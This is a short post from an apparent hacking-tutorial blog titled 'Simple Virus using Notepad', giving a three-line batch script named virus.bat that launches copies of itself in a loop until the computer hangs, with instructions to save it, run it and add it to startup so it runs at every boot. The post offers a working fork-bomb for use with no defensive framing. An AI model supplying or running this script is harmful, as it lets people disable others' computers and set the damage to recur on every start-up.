Online hacking tutorials and information security guide - Hackerznote by Vijay Chaudhary
Showing posts with label notepad virus. Show all posts
Showing posts with label notepad virus. Show all posts
Saturday, 7 June 2014
Simple Virus using Notepad
With this you can create simple notepad virus that can hang any computer...
Open notepad and copy the following code:
:loop
start virus.bat
goto loop
Now save the file with name "virus.bat" and select Save as Type "All files(*)" from list.
If you run this batch file, this keeps executing itself, until you restart your computer.
You can also add this program to startup.
Subscribe to:
Posts (Atom)